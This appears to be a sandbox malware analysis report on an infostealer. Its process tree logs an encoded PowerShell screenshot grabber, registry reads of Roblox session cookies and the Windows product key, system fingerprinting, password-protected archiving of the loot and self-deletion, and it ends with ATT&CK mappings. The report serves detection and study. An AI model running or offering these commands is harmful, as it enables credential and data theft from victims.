    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:3884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:336
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tsbpjfok\tsbpjfok.cmdline"
        5⤵
        
        PID:4956
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB630.tmp" "c:\Users\Admin\AppData\Local\Temp\tsbpjfok\CSC41E2D6C4D0494B478EF74D442E5AC39.TMP"
        6⤵
        
        PID:984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3736
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2240
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3032
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4380
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2032
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2096
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:904
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:628
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:924
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1876
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1540
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1252
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:1168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI11162\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\CirSK.zip" *"
    3⤵
    PID:1036
  - - C:\Users\Admin\AppData\Local\Temp\_MEI11162\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI11162\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\CirSK.zip" *
      4⤵
      Executes dropped EXE
      PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4660
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1788
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3540
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:408
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2096
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:4708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3280
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4540
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1336

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffd7555cc40,0x7ffd7555cc4c,0x7ffd7555cc58
  2⤵
  PID:5084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1816,i,2248701613977638102,2068576167352402113,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1788 /prefetch:2
  2⤵
  PID:4004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1952,i,2248701613977638102,2068576167352402113,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2044 /prefetch:3
  2⤵
  PID:1932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2296,i,2248701613977638102,2068576167352402113,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2276 /prefetch:8
  2⤵
  PID:4052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,2248701613977638102,2068576167352402113,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3196 /prefetch:1
  2⤵
  PID:4268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,2248701613977638102,2068576167352402113,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3220 /prefetch:1
  2⤵
  PID:1388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4544,i,2248701613977638102,2068576167352402113,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4492 /prefetch:1
  2⤵
  PID:716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4876,i,2248701613977638102,2068576167352402113,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4892 /prefetch:8
  2⤵
  PID:64
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4956,i,2248701613977638102,2068576167352402113,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4872 /prefetch:8
  2⤵
  PID:1988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4944,i,2248701613977638102,2068576167352402113,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4924 /prefetch:8
  2⤵
  PID:4524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4888,i,2248701613977638102,2068576167352402113,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5084 /prefetch:8
  2⤵
  PID:1552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5232,i,2248701613977638102,2068576167352402113,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5108 /prefetch:8
  2⤵
  PID:3796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4984,i,2248701613977638102,2068576167352402113,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5340 /prefetch:8
  2⤵
  PID:3904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4708,i,2248701613977638102,2068576167352402113,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5364 /prefetch:2
  2⤵
  PID:4960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4968,i,2248701613977638102,2068576167352402113,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4872 /prefetch:1
  2⤵
  PID:3084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5352,i,2248701613977638102,2068576167352402113,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=900 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3160

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

